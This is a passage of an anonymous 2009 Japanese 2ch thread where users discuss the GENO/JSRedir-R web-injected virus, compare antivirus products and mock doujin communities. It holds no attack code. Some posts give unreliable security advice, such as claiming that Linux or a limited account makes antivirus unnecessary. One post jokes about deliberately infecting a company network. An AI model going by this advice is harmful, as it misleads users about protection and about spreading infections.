124 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:42:43 ] >>●365日、毎日9:00〜24:00まで対応! (#`ハ´)答えは全て「サイインストールスル アル」 >>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート! (#`ハ´)VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル >>●パソコン、メール、インターネット関連のトラブルに対応! (#`ハ´)VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル >>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート! (#`ハ´)VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル >>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内 (#`ハ´)切り分ける能力無いアル。VB不具合全部ハードのせいアルネ >>●電話でわからない場合は、リモート(遠隔操作)で対応も!!で解決!! (#`ハ´)msconfigでスタートアップ・サービス全止め→再起動、なおらなければサイインストール アル
125 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:06 ] >>122 同人サイトがウイルスばらまいてるんだよな あいつらがいなくなれば無くなりそうww
126 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:22 ] たった1日スレ見なかった間になんでこんなに伸びてるの?
127 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:31 ] Meの場合はどうやって感染確認するのでしょうか
128 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:35 ] >>125 とっととサイト消せばいい話なんだけどな
129 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:38 ] 亜種っていっても基本的な感染経路や動作が同じなら対策は変わらないんで、 スレが脱線するのもやむをえない。
130 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:51 ] >>119 lt;丶`∀´gt; PeerGuardian2 ★ 4 (`ハ´ ) pc11.2ch.net/test/read.cgi/sec/1228949365/
131 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:43:55 ] >>118 adobeの穴を閉めとかないとな
132 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:01 ] >>126 腐女子に荒らされた
133 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:10 ] ? セキュリティスレに見せ掛けたオタ叩きスレ?
134 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:33 ] >>129 だよな。
135 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:37 ] >>126 トレンドマイクロいよいよピンチ
136 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:44:44 ] >>133 腐女子が散々荒らした残骸がこのスレです
137 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:45:42 ] >>133 違うよ あいつらが今回のウイルスの原因だから
138 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:45:46 ] ゾイド板から
139 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:45:48 ] >>133 腐女子たたきスレですw 実質同人板の方が機能してる
140 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:45:53 ] このスレで今一番HOTな対策ソフトって何?
141 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:21 ] >>140 ノートン先生です
142 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:35 ] >>140 CAかな
143 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:37 ] >>140 ウイルスバスター
144 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:50 ] >>136 軌道修正しねえの?
145 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:52 ] >>109 IDが出ないから頭のアレな子達が大はしゃぎ
146 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:46:54 ] セキュ板総受けの同人誌出すわ
147 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:47:00 ] とりあえず余計なサイトみなきゃいいと思ってたけど 一般のサイトもやられてるわけで…
148 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:47:14 ] >>140 ノートン先生ですけど、現在休暇中です
149 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:47:49 ] ものすごい自演臭いスレですね。
150 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:47:56 ] >>147 つ携帯
151 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:25 ] >>147 同人の奴らが馬鹿なだけで 他のサイトは大丈夫でしょ
152 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:28 ] バカス臭いな
153 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:30 ] でかいサイトがやられたら日本沈没する
154 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:31 ] GENOウイルス×ノートン先生
155 名前:126 mailto:sage [2009/05/16(土) 21:48:38 ] >>132 なるほど、同人系のサイトが感染喰らって慌ててたってところか… 今更な気がするけど >>135 バスターも何かやらかしたのか…
156 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:56 ] >>150 linux使えよ。 おまえら、linuxは腐女子の基本にしろ そんくらい使いこなせないで、腐女子なのるな 風下だぜ
157 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:48:58 ] googleの検索結果をいじるって面白いな 他の検索エンジンの結果は通常なんだろうか
158 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:49:10 ] GENOのニュースとか日本国外の感染状況はどうなっている?
159 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:49:16 ] 2chだけPCで見て、一般サイトは携帯で見てるわ
160 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:49:23 ] >>150 画面小さくてな… まあ沈静化するまでは最低限そうするわ
161 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:49:29 ] >>140 Linux
162 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:01 ] >>153 いやM$が崩壊するだけさ。 linuxが世界を席巻する
163 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:07 ] 早く対策されて普通に駆除できるようにならんものかなぁ
164 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:07 ] 新たな「Webウイルス」が猛威、感染被害が急増:ITpro itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/ 同社が「JSRedir-R」と命名したもの。 実体はJavaScriptで書かれたプログラム(図1)。 多くの場合、攻撃者は何らかの方法で正規サイトに不正アクセスし、 このウイルスをWebページに埋め込む。 そのページにユーザーがアクセスすると、埋め込まれたウイルスが動き出し、 別のウイルスを勝手にインストールされる恐れなどがある。 これ、GENOウィルス?
165 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:21 ] もしもヤフーやグーグルがやられたらどうなってしまうだろうか
166 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:31 ] >>155 同人だけ異様に発見されてるww
167 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:50:44 ] ウィルスセキュリティは、大丈夫ですか?
168 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:08 ] >>164 それだ
169 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:11 ] >>165 googleは一時期感染報告あったが多分デマ
170 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:21 ] よくわかんないけどホモサイトにいかなきゃいいんだろ
171 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:33 ] avastがプッシュされてるのはほかのに比べてよく検知出来てるから?
172 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:37 ] >>165 グーグルでも感染例が報告済み
173 名前:140 mailto:sage [2009/05/16(土) 21:51:37 ] ノートン先生は対策してるのか?
174 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:51:54 ] >>169 googleの検索結果改竄とごっちゃになってただけだと思う。
175 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:01 ] >>169 多分検索先読みの話がごっちゃになってたんだろな
176 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:10 ] >>173 ノートンはおねんねタイムだよ
177 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 21:52:26 ] >>170 住人だけど、大丈夫だよ。
178 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:30 ] 過去スレ読めよ
179 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:30 ] >>164 俺ら大勝利wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
180 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:33 ] >>173 俺の隣で寝てるから安心汁
181 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:52:50 ] >>171 貧乏人が多いスレだから
182 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:07 ] ニコニコの覗き見検索とやらは?
183 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:12 ] ノートン先生は月曜にならないと起きませんw
184 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:32 ] pc11.2ch.net/test/read.cgi/sec/1242125567/ 答えは全てここにある!
185 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:34 ] >>170 公式サイトでも感染してるくらいのウィルスですよ。 同人サイトも見に行かないほうがいいですが、他にも気をつけましょう。
186 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:35 ] >>163 >>165 だから、Linux使ってれば関係ないってば。 他の惑星系のインフレくらい影響がない。
187 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:47 ] >>171 このウィルスに対して反応が早かった
188 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:53:48 ] >>170 ホモというかアニメとかオタク系は全滅みたいだよ
189 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:54:28 ] >>170 へたなんとかってのが公式感染しててやばいみたいよ メシウマですけどね
190 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:54:30 ] >>173 一緒にお風呂に入ってるよ
191 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:54:41 ] macのbootcamp使いも危ねえのかなーこれは
192 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:12 ] 狐かoperaでおk?
193 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:13 ] >>173 今アップ中 月曜日まで待ってろってばっちゃが言ってた
194 名前:127 mailto:sage [2009/05/16(土) 21:55:32 ] 誰か教えてくだしあ…
195 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:48 ] ttp://shop.trendmicro.co.jp/vb_ms_sp2 ttp://shop.trendmicro.co.jp/store/trendjp/ja_JP/DisplayMSPage これは?
196 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:48 ] >>194 ググれ
197 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:55:54 ] >>164 図1 「JSRedir-R」の一部(ソフォスの情報から引用)。 同ウイルスの実体は、JavaScriptで記述されたプログラム。 難読化された状態でWebページに埋め込まれる itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/?SS=imgview&FD=-654642772&ST=securityhole
198 名前:171 mailto:sage [2009/05/16(土) 21:56:11 ] >>187 なるほどThx
199 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:56:48 ] ベホマ
200 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:56:49 ] ウィルスセキュリティZEROは?
201 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:56:55 ] >>188 そういうレベルの問題じゃないよ
202 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:17 ] >>199 キアリーだろ
203 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:29 ] >>200 さようなら
204 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:35 ] 次スレたったのか
205 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:41 ] >>199 あえてぱふぱふ
206 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:41 ] >>200 先生以外のソフトならおk!
207 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:57:49 ] >>194 avast入れればおk 対応してるかは知らないけど
208 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:58:02 ] ヒットエンドラーン
209 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:58:11 ] >>201 いや、同人関係がほとんどなんだが
210 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:58:13 ] キアリクだろ
211 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:58:20 ] >>200 インドに帰れよ
212 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:59:00 ] >>200 何それ
213 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:59:23 ] 同人同人いってるが それ含めウェブサイトがやべーっていってんだろ
214 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:59:27 ] >>200 K7って書いてくれないと通じないんだけど?
215 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 21:59:59 ] >>209 別に同人関係だけで出回ってるウイルスじゃないから
216 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:06 ] こういう時いつも思うんだが先生っていつ仕事してんのかな
217 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:16 ] 「ウイルス対策ソフトでるから余裕w」と思ってそのまま放置とかありえそうで怖い
218 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:28 ] なんか同人関係を叩けば安心しちゃう変な子がいるな
219 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:35 ] >>197 itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/ph1.jpg www.dotup.org/uploda/www.dotup.org34101.jpg うお これは感染してるページなん
220 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:39 ] >>164 やっと来たか… しかしこれsophosが言ってるのを載せただけだし 日本国内のサイトがいかにやばい状態になってるかはこれじゃわからないだろうな
221 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:43 ] 検体が欲しいのでだれか感染したサイトのURLplz
222 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:00:57 ] >>216 俺らが寝てるときこっそり仕事してるよ
223 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:01:46 ] >>216 ノートン先生の本業はPCを重くすることだぞ
224 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:01:48 ] 俺の他愛ない喧嘩してんの?っていう言葉で 両親が本当に険悪な雰囲気になってしまった これもウィルスのせい?
225 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:01:52 ] ここに書かれてる対策して、あとは月曜まで携帯でネッサ これでおk
226 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:01:53 ] K7は、大丈夫なんでしょうか?
227 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:02:08 ] 検体スレいけ
228 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 22:02:37 ] ペストバトロールはどうですか?
229 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:02:43 ] 先生ありがとう・・・ 先生のことは忘れません・・・
230 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:02:46 ] >>226 インドへお帰りください
231 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:02:51 ] >>23 変わったって何で分かったの?
232 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:03:05 ] ノートン先生にはがんばってほしい
233 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:03:21 ] 遊んでるバカが職場のPCでやらかしそうで怖い
234 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:03:33 ] >>224 主に祭り厨のせい あいつらはとにかくスレで騒いでテンション上げることだけが目的でウイルスとかどうなってもいいんだろ
235 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:04:00 ] >>226 だから先生以外は大丈夫ってさっきから書いてるだろ
236 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:04:27 ] 先生は、いつ仕事しているんですか?
237 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:04:29 ] へんなjavaスクが書いてあるページをjavaスクonにしてブラウザで表示させたらヤバいってことなら、 WWWCでアイコンを右クリック→ソースの表示 (例えばです。他にも一杯やりかたあるんだろうけど。) で、ソースに変なコードがあるかどうか見てみればいいんじゃないの?
238 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:05:00 ] >>164 同一なら、世界でも猛威を振るっていると言うことか・・・。
239 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:05:03 ] >>226 そんなフリーソフトはダメに決まってるだろボケ
240 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:05:22 ] >>237 そんな作業が普通にできる奴なら最初から問題ないんじゃね
241 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:05:31 ] 感染してる奴って自分のサイトみて気付かないわけ?
242 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:06:02 ] ゼロとキングソフトは論外
243 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:06:05 ] 同人サイトから責任を逸らそうとするのが多いなww ここ最近発見されてるのは同人だけだが…?
244 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:06:10 ] >>237 その通り。それである程度防げる で、お前はその作業をページが移るたびにやるつもりか?
245 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:06:23 ] >>241 うんこくさいのにうんこついてない つまりそういうこと
246 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:04 ] カスペなら安心ですか?
247 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:06 ] パスMyPicturesまたはボリュームが無効です。 削除できない
248 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:07 ] >>241 同人スレ行ってみな何も分かってないよ
249 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:33 ] itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/ 慌てた同人のやつらとかひっかかりそうだな
250 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:41 ] スレ伸び加速しすぎw
251 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:47 ] ああ、同人サイトって同人誌無断でアップしてるサイトじゃなくて作ってる方の連中が引っ掛かってるのか なんか思いっきり勘違いしてた
252 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:07:48 ] >>241 このウイルスは人を脅かすのが目的ではなく こっそり各種情報を抜き取るのが目的なんで 感染しているかどうかはできるだけ見た目で判断できないように工夫している 騒ぎの初期には「cmd.exeが起動すれば安心!」みたいなお手軽判定法があったが、 とっくに対策された亜種が出回ってるようだ。
253 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:08:05 ] >>245 じゃあ感染者がソースみてもなんも書いてないけど周りはソース改竄されてるのは見えるわけ?
254 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:08:29 ] >>23 これほんとなの? どこ情報?
255 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:08:44 ] 先生はパルスアップデートで何をアップデートしてるんだよ・・・
256 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:09:10 ] >>243 なんでそんなに同人界隈と闘いたがるの? ウイルス問題を摩り替えてない?
257 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:09:17 ] >>255 あんなの自己満に過ぎないさ
258 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:09:39 ] マジな話だけどIE7,8の「InPrivate」使えば大丈夫じゃね?
259 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:09:51 ] >>255 ファイルの日付
260 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:10:17 ] >>244 うん。 いっつも行くサイトの更新チェックだけでもしたかったから。 でもよく考えたら、あらゆるページをそやって確認するのなんか、 確かにめんどくさ過ぎるわな。
261 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:10:30 ] >>258 おまえ感染してるよ お疲れさん
262 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:10:32 ] >>258 大丈夫かどうか試してみ
263 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:10:40 ] 検体スレってどこ?
264 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:11:11 ] WindowsUpdateが重いが この件で殺到してるのだろうか
265 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:11:24 ] バタリアン並みの感染スピードw
266 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:11:41 ] 腐とボカロと東方死亡∩(・ω・)∩バジャーイ
267 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:11:41 ] >>259 ご丁寧に時間まで更新してるらしいな
268 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:13 ] >>266 害悪ジャンル壊滅かざまあ
269 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:15 ] >>264 ソンビ化したPCがDDoSやってるのかも
270 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:30 ] 捨てようと思ったのにエラーになるわ
271 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:31 ] ノートンのファン回りっぱなし状態はどうにかならないの?
272 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:31 ] >>265 ゾンビのくせに走るのは画期的だったな。
273 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:12:51 ] >>267 先生ちゃんと仕事してるじゃん
274 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:05 ] せんせいは やればできるこ
275 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:06 ] リカバリディスクが見つからなくてクリーンインストールできない、けれど仕事でPCを 使わざるを得ない場合はどうするのがいいんでしょうか。
276 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:17 ] >>261 opera使いの俺には関係ない話だ
277 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:18 ] >>263 【鑑定目的禁止】検出可否報告スレ10 pc11.2ch.net/test/read.cgi/sec/1235459712/ これかな?
278 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:30 ] >>275 仕事を辞める
279 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:13:32 ] >>266 (* >ω<)=3プー そこらへんは全部いらないな
280 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:14:06 ] >>209 それはお前が見てるサイトだけだろ ほかにもある
281 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:14:18 ] 腐女子寝ないの?w
282 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:14:57 ] >>280 もう触るなよ
283 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:15:07 ] >>275 取扱説明書に内部リカバリ手順が載ってるならそれで 駄目ならそのまま繋いで会社全体にウイルスばら撒いて責任問題に発展させる 自殺するなよ
284 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:15:12 ] 小林製薬はCM流す暇合ったら注意喚起しろよ
285 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:15:31 ] CA使ってる自分は負け組
286 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:15:46 ] 同人で大事になってるのは 子供や情弱がちゃんとわかってる人に話しかけられる環境があるからだよ。 普通のコミュニティでは子供は子供、情弱は情弱でまとまってるからそのまま気づかない。
287 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:03 ] >>277 難しくてよくわからねえ・・・ ありがとう
288 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:03 ] >>275 正直に上司に相談しろ 絶対会社のネットワークに繋ぐな
289 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:07 ] >>279 709 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/10(金) 00:13:27 ニコ動で動画再生するとCPU使用率が 50前後ぐらいいくんだけど元々、そんなもんかねぇ コレお前?
290 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:10 ] 仮想化してれば平気?
291 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:16:31 ] >>285 ペンタゴンの人?
292 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:02 ] ネットサーフィンしてたらAVASTが警告出してきたのですぐ閉じた 感染したかと思い再起動してからウィルスチェックしたら何も無し 普通に信用して開いてたら死んでたわ
293 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:12 ] スレから離れられなくて、うんこ漏れそう
294 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:27 ] >>289 それどこのスレの奴だよw
295 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:31 ] >>286 ああ、それっぽいな 普通なら感染も防げるし、 もしなっても自分で調べればわかるかな
296 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:31 ] >>293 ノートン先生で解決だ
297 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:50 ] XPで管理者権限でネットやってる馬鹿が多いって笑えるね 制限者でネット繋げばウイルスソフトも要らないのにwww
298 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:17:59 ] もしニコニコとかが感染したら一気に広がりそうだなこれ
299 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:29 ] >>297 ウイルスソフトなんていらねえよww
300 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:45 ] まだ腐ヲチ・同人ヲチしてるやつはなんなの?自分が荒らしてることに気づかないの?
301 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:45 ] >>298 とっくにやられてたわけだが
302 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:47 ] 513 名前:geno[sage] 投稿日:2009/05/16(土) 21:56:55 ID:GQnaax2E0 痛ニュとかの有名どころのコピペブログ感染してるな ライブドアもか
303 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:18:50 ] >>296 垂れ流しちゃえ
304 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:07 ] >>296 先生万能すぐる
305 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:14 ] >>299 恒例の流れになってんなw
306 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:44 ] >283 内部リカバリーの存在をすっかり忘れていました! マジで感謝です。 これってパーティションで区切ってあるDドライブの方はそのままでも大丈夫ですか?
307 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:47 ] サイトにウィルスコードを埋め込むってウィルスから取得したパスワードとかの 情報を使って第三者が改ざんするってこと?
308 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:48 ] ウイルスソフトって何? バスターのことかい?
309 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:19:58 ] >>301 やられてたのはsaymoveの覗き見検索じゃないのか? ニコニコ自体がやられてたら、それはそれでおもしろそうなんだが
310 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:20:20 ] 東方ジャンルが死んだのはめでたい
311 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:20:37 ] javaオフでも感染する場合があるんだっけ? もうフラフラできんな 2chブラウザで2chしか見れなくなりそう
312 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:20:42 ] >>306 やるだけやってみて駄目なら諦めたら?
313 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 22:20:46 ] >>307 FTPで接続したときパスとかバレて第三者に云々
